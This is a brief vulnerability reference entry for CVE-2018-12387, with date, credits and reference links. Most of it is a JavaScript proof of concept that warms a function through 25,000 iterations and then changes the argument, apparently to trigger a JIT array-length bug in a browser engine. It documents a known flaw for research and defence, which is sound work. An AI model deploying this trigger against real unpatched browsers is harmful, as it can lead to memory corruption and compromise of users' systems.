CVE-2018-12387.md

CVE-2018-12387

• Date: Oct 2018
• Credit: Bruno Keith and Niklas Baumstark

PoC

function f(o) {
    var a = [o];
    a.length = a[0];
    var useless = function () {}
    var sz = Array.prototype.push.call(a, 42, 43);
    (function () {
        sz;
    })(new Boolean(false));
}
for (var i = 0; i < 25000; i++) {
    f(1);
}
f(2);

Reference

• Issue
• SecuriTeam